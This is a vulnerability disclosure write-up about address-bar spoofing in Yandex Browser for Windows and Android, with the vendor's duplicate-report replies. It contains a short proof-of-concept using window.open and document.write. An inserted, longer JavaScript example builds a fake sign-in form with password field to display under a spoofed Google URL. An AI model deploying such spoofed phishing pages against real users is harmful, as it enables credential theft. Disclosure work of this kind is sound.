
Yandex Browser - Address Bar Spoofing

Disclaimer: both vulnerabilities were reported to the Yandex Security Team and considered duplicates, so I was not the first one to discover them.

Yandex Browser for Windows

This issue was reported on 19th July 2016 at 21:36.

By making a user visit an attacker-controlled page that uses the window.open and document.write functions, it was possible to spoof the URL shown in the address bar. The window opened by window.open starts out as an about:blank document that the opener can write into, while the address bar already displays the URL that was passed to window.open.

Workflow:

  • Once the page loads, a function is triggered. In my PoC, the function was triggered when a button is clicked.
  • The function opens a new window with window.open, pointing it at the URL that is going to be spoofed.
  • By calling document.write on that new window, we write a script that itself calls document.write and writes the content; usually this content would be a phishing login panel. My PoC used document.location so that the reviewers could see the real location instead of the one the address bar was showing.

So the final code was:

```html
<!-- PoC: open the target URL, then write into the new window's document,
     which is still the blank, opener-controlled document while the
     address bar already shows the target URL. -->
<script>
function spoof() {
        nWindow = window.open('https:/www.google.com', '_t1');
        nWindow.document.write('<pre>Here we could place a phishing login panel</pre>');
}
</script>
<input type="button" onclick="spoof()" value="PoC!">
```

The page is hosted on my server.
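As an added example (not the gist's PoC and not Yandex's code), here is the nested document.write step from the workflow above in a form whose pieces can be checked outside a browser: buildSpoofPayload builds the script string that the opener writes into the opened window, normalizeTarget shows what the single-slash URL in the PoC actually resolves to, originsDiffer is the check a reviewer would apply (compare the origin the address bar displays with document.location of the written page), and spoof is the browser-only trigger. All function names and the sample phishing markup are my own assumptions.

```javascript
// Added example, not the gist's own PoC. PHISH_HTML, buildSpoofPayload,
// normalizeTarget, originsDiffer and spoof are assumed names of mine.

// Constructed sample of what the attacker shows under the spoofed URL.
const PHISH_HTML =
  '<h2>Sign in to continue</h2>' +
  '<form><input name="user" placeholder="email">' +
  '<input name="pass" type="password"></form>';

// The string the opener writes into the new window. It is the nested
// document.write from the workflow: an inline script that writes the
// phishing content and then prints document.location.href, so the real
// document URL can be compared with what the address bar shows.
function buildSpoofPayload(phishHtml) {
  // phishHtml becomes a JS string literal inside the inner script. A literal
  // script end tag inside that string would close the inner script element
  // early, so every "</" is turned into the JS escape "<\/", which evaluates
  // back to "</" when the inner script runs.
  const literal = JSON.stringify(phishHtml).replace(/<\//g, '<\\/');
  return [
    '<script>',
    '  document.write(' + literal + ');',
    '  document.write("<pre>real location: " + document.location.href + "</pre>");',
    // Split so this file can be inlined into the PoC page's own script element
    // without the HTML parser closing that outer element at this line.
    '</scr' + 'ipt>',
  ].join('\n');
}

// The gist's PoC passes 'https:/www.google.com' (one slash). The WHATWG URL
// parser treats a missing slash after a special scheme as a recoverable
// error, so the navigation target is still https://www.google.com/.
function normalizeTarget(url) {
  return new URL(url).href;
}

// Origin of a URL string, or null if it is not parseable as a URL.
function originOf(s) {
  try {
    return new URL(s).origin;
  } catch (e) {
    return null;
  }
}

// The bug is that the address bar and the real document disagree. Returns
// true when their origins differ; about:blank has the opaque origin "null",
// so it differs from any https origin the address bar might display.
function originsDiffer(addressBarText, realHref) {
  return originOf(addressBarText) !== originOf(realHref);
}

// Browser-only trigger, mirroring the gist's button handler.
function spoof(targetUrl, phishHtml) {
  if (typeof window === 'undefined') {
    throw new Error('spoof() needs a browser; the helpers above run anywhere');
  }
  // The new window starts as an about:blank document that the opener
  // controls, while the address bar already shows targetUrl.
  const w = window.open(normalizeTarget(targetUrl), '_t1');
  w.document.write(buildSpoofPayload(phishHtml));
  return w;
}
```

In a browser, wire spoof('https://www.google.com', PHISH_HTML) to a button as the gist does; a patched browser should show about:blank (or the opener's URL) in the address bar, which originsDiffer then reports as matching the written document.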

Result

Final email about this vulnerability was:
Hello!

Unfortunately the issue had been reported by another researcher before we got your report. We've been working on the fix for several days and it will be rolled out shortly.

Have a nice day!
--
Vasiliy Kuznetsov Yandex Security Team


Yandex Browser for Android

This issue was reported on 19th July 2016 at 18:41.

The workflow is exactly the same again.

Before running the PoC:


![ResultMobile1](http://i.imgur.com/jDPQ1mp.jpg)

After running the PoC:


![ResultMobile2](http://i.imgur.com/yOQKHwH.jpg)

Final emails about this vulnerability were:
Hello, Miguel Ángel!

As for Android, I'll check it shortly because it looks similar to one report we got the other day. I'll let you know in a few days.

Have a great weekend!

Hello, Miguel Ángel!

I'm sorry, but the same bug had been reported by another researcher before we'd got your report. That's why we can't offer you a reward.

I hope you've enjoyed this write up.

If you're the one who reported these vulnerabilities before me and you want me to remove this post, please send me a message via Twitter.

Kind regards!
